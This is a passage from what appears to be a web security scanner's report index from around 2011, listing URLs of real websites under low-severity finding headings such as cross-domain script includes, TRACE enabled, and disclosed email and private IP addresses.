18.46. http://bs.serving-sys.com/BurstingPipe/adServer.bs
18.47. http://cm.g.doubleclick.net/pixel
18.48. http://cm.g.doubleclick.net/pixel
18.49. http://cm.g.doubleclick.net/pixel
18.50. https://code.google.com/p/domsnitch/downloads/detail
18.51. http://consultants-locator.apple.com/index.php
18.52. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
18.53. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
18.54. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
18.55. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
18.56. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
18.57. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
18.58. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
18.59. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
18.60. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
18.61. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
18.62. http://d.101m3.com/afr.php
18.63. http://d.101m3.com/afr.php
18.64. http://d.101m3.com/afr.php
18.65. http://dg.specificclick.net/
18.66. http://dinclinx.com/
18.67. http://googleads.g.doubleclick.net/pagead/ads
18.68. http://googleads.g.doubleclick.net/pagead/ads
18.69. http://googleads.g.doubleclick.net/pagead/ads
18.70. http://googleads.g.doubleclick.net/pagead/ads
18.71. http://googleads.g.doubleclick.net/pagead/ads
18.72. http://googleads.g.doubleclick.net/pagead/ads
18.73. http://googleads.g.doubleclick.net/pagead/ads
18.74. http://googleads.g.doubleclick.net/pagead/ads
18.75. http://googleads.g.doubleclick.net/pagead/ads
18.76. http://googleads.g.doubleclick.net/pagead/ads
18.77. http://googleads.g.doubleclick.net/pagead/ads
18.78. http://googleads.g.doubleclick.net/pagead/ads
18.79. http://greatponds.squarespace.com/universal/scripts/global.js
18.80. http://hipservice.live.com/gethip.srf
18.81. http://home.live.com/search
18.82. http://home.live.com/search/hip
18.83. http://ib.adnxs.com/if
18.84. http://ib.adnxs.com/ptj
18.85. http://ib.adnxs.com/ptj
18.86. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js
18.87. http://maps.google.com/maps
18.88. http://media.fastclick.net/w/get.media
18.89. http://mediacdn.disqus.com/1311185431/build/system/disqus.js
18.90. http://mediacdn.disqus.com/1311376479/build/system/disqus.js
18.91. http://my.seashepherd.org/NetCommunity/Page.aspx
18.92. http://oascentral.discovery.com/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70
18.93. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx
18.94. http://pixel.everesttech.net/2368/gr
18.95. http://pixel.invitemedia.com/admeld_sync
18.96. http://platform0.twitter.com/widgets/follow_button.html
18.97. http://player.vimeo.com/video/18305022
18.98. http://player.vimeo.com/video/25752549
18.99. http://player.vimeo.com/video/26341323
18.100. http://player.vimeo.com/video/8022406
18.101. http://rad.msn.com/ADSAdClient31.dll
18.102. http://rad.msn.com/ADSAdClient31.dll
18.103. http://rad.msn.com/ADSAdClient31.dll
18.104. http://rad.msn.com/ADSAdClient31.dll
18.105. http://rad.msn.com/ADSAdClient31.dll
18.106. http://rad.msn.com/ADSAdClient31.dll
18.107. http://rad.msn.com/ADSAdClient31.dll
18.108. http://rad.msn.com/ADSAdClient31.dll
18.109. http://rad.msn.com/ADSAdClient31.dll
18.110. http://rad.msn.com/ADSAdClient31.dll
18.111. http://rad.msn.com/ADSAdClient31.dll
18.112. http://rd.apmebf.com/w/get.media
18.113. http://scmagazineus.disqus.com/combination_widget.js
18.114. http://showadsak.pubmatic.com/AdServer/AdServerServlet
18.115. http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css
18.116. http://social.msdn.microsoft.com/Search/en-US
18.117. http://social.msdn.microsoft.com/Search/en-US
18.118. http://social.msdn.microsoft.com/Search/en-US
18.119. http://social.msdn.microsoft.com/Search/en-US/en-USebb6e
18.120. http://social.msdn.microsoft.com/search/en-US
18.121. http://static.curse.com/themes/common/v6/scripts/core.js
18.122. http://syndication.jobthread.com/jt/syndication/page.php
18.123. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220
18.124. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula
18.125. http://visualstudiogallery.msdn.microsoft.com/site/search
18.126. http://visualstudiogallery.msdn.microsoft.com/site/search
18.127. http://widgets.klout.com/
18.128. http://www.bing.com/search
18.129. http://www.boston.com/dynamicassembly/sitepath54/js_output.js
18.130. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/
18.131. http://www.capitalone.com/directbanking/
18.132. http://www.datacard.com/combined.js
18.133. http://www.facebook.com/connect/connect.php
18.134. http://www.facebook.com/connect/connect.php
18.135. http://www.facebook.com/connect/connect.php
18.136. http://www.facebook.com/connect/connect.php
18.137. http://www.facebook.com/plugins/comments.php
18.138. http://www.facebook.com/plugins/comments.php
18.139. http://www.facebook.com/plugins/comments.php
18.140. http://www.facebook.com/plugins/comments.php
18.141. http://www.facebook.com/plugins/comments.php
18.142. http://www.facebook.com/plugins/comments.php
18.143. http://www.facebook.com/plugins/comments.php
18.144. http://www.facebook.com/plugins/comments.php
18.145. http://www.facebook.com/plugins/comments.php
18.146. http://www.facebook.com/plugins/comments.php
18.147. http://www.facebook.com/plugins/comments.php
18.148. http://www.facebook.com/plugins/comments.php
18.149. http://www.facebook.com/plugins/comments.php
18.150. http://www.facebook.com/plugins/comments.php
18.151. http://www.facebook.com/plugins/comments.php
18.152. http://www.facebook.com/plugins/comments.php
18.153. http://www.facebook.com/plugins/comments.php
18.154. http://www.facebook.com/plugins/comments.php
18.155. http://www.facebook.com/plugins/comments.php
18.156. http://www.facebook.com/plugins/comments.php
18.157. http://www.facebook.com/plugins/comments.php
18.158. http://www.facebook.com/plugins/comments.php
18.159. http://www.facebook.com/plugins/comments.php
18.160. http://www.facebook.com/plugins/comments.php
18.161. http://www.facebook.com/plugins/fan.php
18.162. http://www.facebook.com/plugins/like.php
18.163. http://www.facebook.com/plugins/likebox.php
18.164. http://www.facebook.com/plugins/likebox.php
18.165. http://www.facebook.com/plugins/likebox.php
18.166. http://www.facebook.com/plugins/likebox.php
18.167. http://www.google.com/search
18.168. http://www.google.com/search
18.169. http://www.google.com/search
18.170. http://www.google.com/search
18.171. http://www.google.com/search
18.172. http://www.google.com/url
18.173. http://www.google.com/url
18.174. http://www.google.com/url
18.175. http://www.greatpondsma.org/universal/scripts/global.js
18.176. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx
18.177. http://www.lifescript.com/adcontrol.htm
18.178. http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx
18.179. http://www.microsoft.com/en-us/homepage/Components/Grid/Home.asch
18.180. http://www.microsoft.com/en-us/homepage/Components/Grid/Work-Business.asch
18.181. http://www.microsoft.com/en-us/security_essentials/Search.aspx
18.182. http://www.microsoft.com/en-us/security_essentials/default.aspx
18.183. http://www.myyearbook.com/advertising/default.php
18.184. http://www.nmmlaw.com/index.php
18.185. http://www.paloaltonetworks.com/cam/switch/index.php
18.186. http://www.scmagazineus.com/js/scripts.js
18.187. http://www.silverlight.net/silverlight-adchain.html
18.188. http://www.silverlight.net/silverlight-adchain.html
18.189. http://www.treehugger.com/galleries/
18.190. http://www.treehugger.com/science_technology/
18.191. http://www.treehugger.com/travel_nature/
18.192. http://www.youtube.com/embed/6hCRafyV0zI
18.193. http://www.youtube.com/embed/pDXWOjC-AlA
19. Cross-domain script include
19.1. http://a.fsdn.com/adops/google/rev2/afc/sf_google_afc.js
19.2. http://a.netmng.com/hic/
19.3. http://a.netmng.com/hic/
19.4. http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33
19.5. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10
19.6. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11
19.7. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12
19.8. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16
19.9. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17
19.10. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
19.11. http://aka-cdn-ns.adtechus.com/apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile2.js
19.12. http://analytics.microsoft.com/Sync.html
19.13. http://analytics.msn.com/Include.html
19.14. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js
19.15. http://assets.tumblr.com/iframe.html
19.16. http://betaworks.com/
19.17. http://c627028.r28.cf2.rackcdn.com/google28reddefaultsUSA728x90.html
19.18. http://c627028.r28.cf2.rackcdn.com/google29reddefaultsUSA728x90.html
19.19. http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html
19.20. https://code.google.com/p/domsnitch/downloads/detail
19.21. https://code.google.com/p/domsnitch/downloads/list
19.22. http://code.msdn.microsoft.com/
19.23. http://consultants-locator.apple.com/index.php
19.24. http://corp.klout.com/blog/
19.25. http://corp.klout.com/careers
19.26. http://corp.klout.com/contact
19.27. http://corp.klout.com/kscore
19.28. http://corp.klout.com/perks
19.29. http://corp.klout.com/press
19.30. http://corp.klout.com/privacy
19.31. http://corp.klout.com/terms
19.32. http://games.myyearbook.com/
19.33. http://games.myyearbook.com/landing/pool
19.34. http://geek.net/
19.35. http://go.ionearth.com/
19.36. http://googleads.g.doubleclick.net/pagead/ads
19.37. http://googleads.g.doubleclick.net/pagead/ads
19.38. http://home.live.com/search
19.39. http://home.live.com/search/hip
19.40. http://ib.adnxs.com/if
19.41. http://keepitfresh.frid.ge/
19.42. http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
19.43. http://my.seashepherd.org/NetCommunity/Page.aspx
19.44. http://oascentral.discovery.com/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70
19.45. http://player.vimeo.com/video/18305022
19.46. http://player.vimeo.com/video/25752549
19.47. http://player.vimeo.com/video/26341323
19.48. http://player.vimeo.com/video/8022406
19.49. http://research.microsoft.com/en-us/
19.50. http://research.microsoft.com/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx
19.51. http://research.microsoft.com/en-us/events/fs2011/default.aspx
19.52. http://research.microsoft.com/en-us/events/fs2011/demofest.aspx
19.53. http://s1.lqcdn.com/m.min.js
19.54. http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css
19.55. http://social.msdn.microsoft.com/Search/en-US
19.56. http://social.msdn.microsoft.com/search/en-US/en-USebb6e
19.57. http://sourceforge.net/projects/hoytllc-vcloud/
19.58. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220
19.59. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/
19.60. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description
19.61. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula
19.62. http://visualstudiogallery.msdn.microsoft.com/site/search
19.63. http://widgets.klout.com/
19.64. http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
19.65. http://www.asp.net/ajax
19.66. http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/
19.67. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/
19.68. http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/
19.69. http://www.datacard.com/
19.70. http://www.facebook.com/connect/connect.php
19.71. http://www.facebook.com/connect/connect.php
19.72. http://www.facebook.com/plugins/comments.php
19.73. http://www.facebook.com/plugins/comments.php
19.74. http://www.facebook.com/plugins/fan.php
19.75. http://www.facebook.com/plugins/likebox.php
19.76. http://www.hitcon.org/hit2011/
19.77. http://www.hitcon.org/hit2011/download.html
19.78. http://www.jackhenry.com/
19.79. http://www.jackhenrybanking.com/
19.80. http://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx
19.81. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx
19.82. http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
19.83. http://www.lifescript.com/adcontrol.htm
19.84. http://www.m86security.com/products/web_security/m86-web-filtering-reporting-suite.asp
19.85. http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx
19.86. http://www.microsoft.com/en-us/default.aspx
19.87. http://www.microsoft.com/en-us/security_essentials/Search.aspx
19.88. http://www.microsoft.com/en-us/security_essentials/Support.aspx
19.89. http://www.microsoft.com/en-us/security_essentials/default.aspx
19.90. http://www.myyearbook.com/advertising/default.php
19.91. http://www.nmmlaw.com/index.php
19.92. http://www.observer.com/
19.93. http://www.paloaltonetworks.com/cam/switch/index.php
19.94. http://www.scmagazineus.com/
19.95. http://www.seashepherd.org/
19.96. http://www.seashepherd.org/media/js/jquery.prettyPhoto.js
19.97. http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263
19.98. http://www.seashepherd.org/popups/mobile-signup-lightbox/
19.99. http://www.silverpop.com/
19.100. http://www.silverpop.com/demo/index.html
19.101. http://www.silverpop.com/marketing-resources/index.html
19.102. http://www.silverpop.com/tweets.html
19.103. http://www.treehugger.com/daylife/related/72065.html
19.104. http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
19.105. http://www.treehugger.com/galleries/
19.106. http://www.treehugger.com/science_technology/
19.107. http://www.treehugger.com/travel_nature/
19.108. http://www.uscgnews.com/go/doc/786/1135035/
19.109. http://www.youtube.com/embed/6hCRafyV0zI
19.110. http://www.youtube.com/embed/pDXWOjC-AlA
19.111. http://www.youtube.com/embed/terD85scv4w
20. File upload functionality
20.1. http://a.fsdn.com/con/js/min/sf.js
20.2. http://mediacdn.disqus.com/1311382870/build/system/upload.html
20.3. http://sourceforge.net/projects/hoytllc-vcloud/
21. TRACE method is enabled
21.1. http://cheetah.vizu.com/
21.2. http://forums-test.vostu.com/
21.3. http://forums.vostu.com/
21.4. http://mm.chitika.net/
21.5. http://pixel.everesttech.net/
21.6. http://pixel1350.everesttech.net/
21.7. http://puma.vizu.com/
21.8. http://web2.checkm8.com/
22. Email addresses disclosed
22.1. http://ads1.msn.com/library/dap.js
22.2. http://betaworks.com/
22.3. http://blogs.msdn.com/utility/js/omni_rsid_msdn_current.js
22.4. http://clients.mobilecause.com/lists/1227/subscriptions/web.js
22.5. https://code.google.com/p/domsnitch/downloads/detail
22.6. http://code.msdn.microsoft.com/
22.7. http://consultants-locator.apple.com/javascript/yui/accordionview.js
22.8. http://consultants.apple.com/jquery.innerfade.js
22.9. http://corp.klout.com/blog/
22.10. http://corp.klout.com/blog/wp-content/themes/klout/blog.css
22.11. http://corp.klout.com/press
22.12. http://corp.klout.com/privacy
22.13. http://forums.vostu.com/
22.14. http://frid.ge/scripts/fridge-combined.1311259715.js
22.15. http://i1.asp.net/umbraco-script/msc_all.js
22.16. http://i1.code.msdn.s-msft.com/GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js
22.17. http://i1.codeplex.com/scripts/v17950/i7/ScriptLoader.ashx
22.18. http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js
22.19. http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js
22.20. http://i2.msdn.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js
22.21. http://i2.msdn.microsoft.com/Platform/Controls/Omniture/resources/MSDN/omni_rsid_msdn-bn20110713.js
22.22. http://i2.silverlight.net/scripts/omniture.js
22.23. http://images.apple.com/global/scripts/lib/event_mixins.js
22.24. http://images.apple.com/global/scripts/lib/scriptaculous.js
22.25. http://js.wlxrs.com/~Live.SiteContent.ID/~16.1.11/~/~/~/~/js/Main_WLStrings_JS1033.js
22.26. http://keepitfresh.frid.ge/
22.27. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/357c/maps2/%7Bmod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw,mod_mg%7D.js
22.28. http://mediacdn.disqus.com/1311185431/build/system/disqus.js
22.29. http://mediacdn.disqus.com/1311376479/build/system/disqus.js
22.30. https://onlinebanking.capitalone.com/CapitalOne/Enrollment.aspx
22.31. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110719191037.js
22.32. http://sj.wsj.net/djscript/require/j_global_slim/version/20110721222540.js
22.33. http://storeimages.apple.com/1867/store.apple.com/rs/js/store/release/apple.js
22.34. http://widgets.twimg.com/j/2/widget.js
22.35. http://www.articleonepartners.com/sidebar-modules/get_blog_json.php
22.36. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/
22.37. http://www.capitalone.com/contactus/index.php
22.38. http://www.capitalone.com/css/footer.css
22.39. http://www.capitalone.com/css/framework/base.css
22.40. http://www.capitalone.com/css/framework/grid.css
22.41. http://www.capitalone.com/css/framework/print.css
22.42. http://www.capitalone.com/css/header.css
22.43. http://www.capitalone.com/css/page-nav-heading.css
22.44. http://www.capitalone.com/scripts/https-common/jquery/tooltip/bgiframe.js
22.45. https://www.capitalone.com/css/footer.css
22.46. https://www.capitalone.com/css/framework/base.css
22.47. https://www.capitalone.com/css/framework/grid.css
22.48. https://www.capitalone.com/css/framework/print.css
22.49. https://www.capitalone.com/css/header.css
22.50. https://www.capitalone.com/css/page-nav-heading.css
22.51. https://www.capitalone.com/css/page-type/homepage.css
22.52. http://www.google.com/search
22.53. https://www.google.com/accounts/ServiceLogin
22.54. http://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx
22.55. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx
22.56. http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
22.57. http://www.lifescript.com/js/jquery.innerfade.js
22.58. http://www.observer.com/
22.59. http://www.paloaltonetworks.com/js/plugins/jquery.colorbox.js
22.60. http://www.scmagazineus.com/
22.61. http://www.silverpop.com/Scripts/new-banners.js
22.62. http://www.silverpop.com/preferences_sf/preferences_sf.js.php
22.63. http://www.treehugger.com/h-code.js
22.64. http://www.treehugger.com/scripts/colorbox/jquery.colorbox.js
22.65. http://www.vostu.com/en/
22.66. http://www.vostu.com/en/2011/04/20/megacity-takes-brazil-by-storm/
22.67. http://www.vostu.com/en/news/
23. Private IP addresses disclosed
23.1. http://api.facebook.com/restserver.php
23.2. http://api.facebook.com/restserver.php
23.3. http://api.facebook.com/restserver.php
23.4. http://api.facebook.com/restserver.php
23.5. http://api.facebook.com/restserver.php
23.6. http://api.facebook.com/restserver.php
23.7. http://assets.0.mybcdna.com//images/HomeBeforeLogin/btn_sign_up_free.png
23.8. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js
23.9. http://assets.0.mybcdna.com/images/games/tiles/19_medium.gif
23.10. http://assets.0.mybcdna.com/images/games/tiles/57_medium.gif
23.11. http://assets.2.mybcdna.com//images/favicon.ico
23.12. http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css
23.13. http://assets.2.mybcdna.com/images/Connect/hbl_login_divider.png
23.14. http://assets.2.mybcdna.com/images/HomeBeforeLogin/background_content.png
23.15. http://assets.2.mybcdna.com/images/HomeBeforeLogin/feed_logos.png
23.16. http://assets.2.mybcdna.com/images/HomeBeforeLogin/feed_nav_icons.png
23.17. http://assets.2.mybcdna.com/images/HomeBeforeLogin/login_button.png
23.18. http://assets.2.mybcdna.com/images/Navbar/nav_sprite_default.png
23.19. http://assets.2.mybcdna.com/images/games/tiles/81_medium.gif
23.20. http://assets.2.mybcdna.com/images/gradient_sprite.png
23.21. http://assets.2.mybcdna.com/images/header_sprite.png
23.22. http://assets.3.mybcdna.com/images/PremiumGifts/pg_wrap2_orange.jpg
23.23. http://assets.5.mybcdna.com/images/PremiumGifts/pg_wrap2_summer2.jpg
23.24. http://assets.6.mybcdna.com/images/games/tiles/30_medium.gif
23.25. http://assets.myyearbook.com/images/games/partnerAds/fourplay.png
23.26. http://assets.myyearbook.com/nerve/css/nerve.css
23.27. http://assets.myyearbook.com/nerve/js/nerve.js
23.28. http://ch2lb.checkm8.com/adam/cm8_detect_ad.js
23.29. http://ch2lb.checkm8.com/data/420913/presitial_SC_logo.gif
23.30. http://ch2lb.checkm8.com/data/442707/Nom_640x480.gif
23.31. http://connect.facebook.net/en_US/all.js
23.32. http://connect.facebook.net/en_US/all.js
23.33. http://connect.facebook.net/en_US/all.js
23.34. http://connect.facebook.net/en_US/all.js
23.35. http://connect.facebook.net/en_US/all.js
23.36. http://games.myyearbook.com/
23.37. http://games.myyearbook.com/landing/pool
23.38. http://home.myyearbook.com/Countries
23.39. http://home.myyearbook.com/favicon.ico
23.40. http://home.myyearbook.com/feed/giftFeedItems
23.41. http://home.myyearbook.com/feed/myMagFeedItems
23.42. http://home.myyearbook.com/feed/tvFeedItems
23.43. http://myyearbook.com/
23.44. http://player.vimeo.com/video/18305022
23.45. http://player.vimeo.com/video/25752549
23.46. http://player.vimeo.com/video/25752549
23.47. http://player.vimeo.com/video/26341323
23.48. http://player.vimeo.com/video/8022406
23.49. http://player.vimeo.com/video/8022406
23.50. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif
23.51. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
23.52. http://research.microsoft.com/en-us/
23.53. http://research.microsoft.com/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx
23.54. http://research.microsoft.com/en-us/events/fs2011/default.aspx
23.55. http://research.microsoft.com/en-us/events/fs2011/demofest.aspx
23.56. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
23.57. http://static.ak.fbcdn.net/connect.php/css/share-button-css
23.58. http://static.ak.fbcdn.net/connect.php/js/FB.Share
23.59. http://static.ak.fbcdn.net/connect/xd_proxy.php
23.60. http://static.ak.fbcdn.net/connect/xd_proxy.php
23.61. http://static.ak.fbcdn.net/connect/xd_proxy.php
23.62. http://static.ak.fbcdn.net/connect/xd_proxy.php
23.63. http://static.ak.fbcdn.net/connect/xd_proxy.php
23.64. http://static.ak.fbcdn.net/connect/xd_proxy.php
23.65. http://static.ak.fbcdn.net/connect/xd_proxy.php
23.66. http://static.ak.fbcdn.net/images/connect_sprite.png
23.67. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js
23.68. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/C0OtqEd7THh.css
23.69. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css
23.70. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
23.71. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/v3AaEMJaNiA.js
23.72. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
23.73. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/yGAzEWR0-5b.js
23.74. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/JSqaF4G1Vob.css
23.75. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css
23.76. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css
23.77. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/mfm5LaL5Ify.css
23.78. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/znpKCeUuNfm.css
23.79. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/znpKCeUuNfm.css
23.80. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
23.81. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/AQsou8r87UO.js
23.82. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css
23.83. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/ay94DQdlwaE.js
23.84. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
23.85. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
23.86. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/myfphzY3EFO.js
23.87. http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
23.88. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js
23.89. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js
23.90. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/jsZvfR86-A1.js
23.91. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/jsZvfR86-A1.js
23.92. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png
23.93. http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/FGFbc80dUKj.png
23.94. http://static.ak.fbcdn.net/rsrc.php/v1/zN/r/BAsr4eOOsw6.png
23.95. http://static.ak.fbcdn.net/rsrc.php/v1/zW/r/0t0iUYDtV0L.png
23.96. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png
23.97. http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/_IKHHfAgFQe.png
23.98. http://static.ak.fbcdn.net/rsrc.php/v1/zj/r/FSEB6oLTK3I.png
23.99. http://takeover.myyearbook.com/6443/main_image.jpg
23.100. http://web2.checkm8.com/adam/detect
23.101. http://web2.checkm8.com/adam/em/ad_play/442707/cat=47183/uhook=6DF1BDD4075B/criterias=32_0_43_3_103_18_104_12_116_225_117_225045_118_1_120_4000000100_122_4225045100_280_22_282_0_283_0_/ord=8851318688487949
23.102. http://web2.checkm8.com/dispatcher_scripts/browserDataDetect.js
23.103. http://www.facebook.com/connect/connect.php
23.104. http://www.facebook.com/connect/connect.php
23.105. http://www.facebook.com/connect/connect.php
23.106. http://www.facebook.com/connect/connect.php
23.107. http://www.facebook.com/extern/login_status.php
23.108. http://www.facebook.com/extern/login_status.php
23.109. http://www.facebook.com/extern/login_status.php
23.110. http://www.facebook.com/extern/login_status.php
23.111. http://www.facebook.com/extern/login_status.php
23.112. http://www.facebook.com/extern/login_status.php
23.113. http://www.facebook.com/extern/login_status.php
23.114. http://www.facebook.com/extern/login_status.php
23.115. http://www.facebook.com/extern/login_status.php
23.116. http://www.facebook.com/extern/login_status.php
23.117. http://www.facebook.com/plugins/comments.php
23.118. http://www.facebook.com/plugins/comments.php
23.119. http://www.facebook.com/plugins/comments.php
23.120. http://www.facebook.com/plugins/comments.php
23.121. http://www.facebook.com/plugins/comments.php
23.122. http://www.facebook.com/plugins/comments.php
23.123. http://www.facebook.com/plugins/comments.php
23.124. http://www.facebook.com/plugins/comments.php
23.125. http://www.facebook.com/plugins/comments.php
23.126. http://www.facebook.com/plugins/comments.php
23.127. http://www.facebook.com/plugins/comments.php
23.128. http://www.facebook.com/plugins/comments.php
23.129. http://www.facebook.com/plugins/comments.php
23.130. http://www.facebook.com/plugins/comments.php
23.131. http://www.facebook.com/plugins/comments.php
23.132. http://www.facebook.com/plugins/comments.php
23.133. http://www.facebook.com/plugins/comments.php
23.134. http://www.facebook.com/plugins/comments.php
23.135. http://www.facebook.com/plugins/comments.php
23.136. http://www.facebook.com/plugins/comments.php
23.137. http://www.facebook.com/plugins/comments.php
23.138. http://www.facebook.com/plugins/comments.php
23.139. http://www.facebook.com/plugins/comments.php
23.140. http://www.facebook.com/plugins/comments.php
23.141. http://www.facebook.com/plugins/comments.php
23.142. http://www.facebook.com/plugins/fan.php
23.143. http://www.facebook.com/plugins/like.php
23.144. http://www.facebook.com/plugins/like.php
23.145. http://www.facebook.com/plugins/like.php
23.146. http://www.facebook.com/plugins/like.php
23.147. http://www.facebook.com/plugins/like.php
23.148. http://www.facebook.com/plugins/like.php
23.149. http://www.facebook.com/plugins/like.php
23.150. http://www.facebook.com/plugins/like.php
23.151. http://www.facebook.com/plugins/like.php
23.152. http://www.facebook.com/plugins/like.php
23.153. http://www.facebook.com/plugins/like.php
23.154. http://www.facebook.com/plugins/like.php
23.155. http://www.facebook.com/plugins/like.php
23.156. http://www.facebook.com/plugins/like.php
23.157. http://www.facebook.com/plugins/like.php
23.158. http://www.facebook.com/plugins/like.php
23.159. http://www.facebook.com/plugins/like.php
23.160. http://www.facebook.com/plugins/like.php
23.161. http://www.facebook.com/plugins/like.php
23.162. http://www.facebook.com/plugins/like.php
23.163. http://www.facebook.com/plugins/like.php
23.164. http://www.facebook.com/plugins/like.php
23.165. http://www.facebook.com/plugins/like.php
23.166. http://www.facebook.com/plugins/like.php
23.167. http://www.facebook.com/plugins/like.php
23.168. http://www.facebook.com/plugins/like.php
23.169. http://www.facebook.com/plugins/like.php
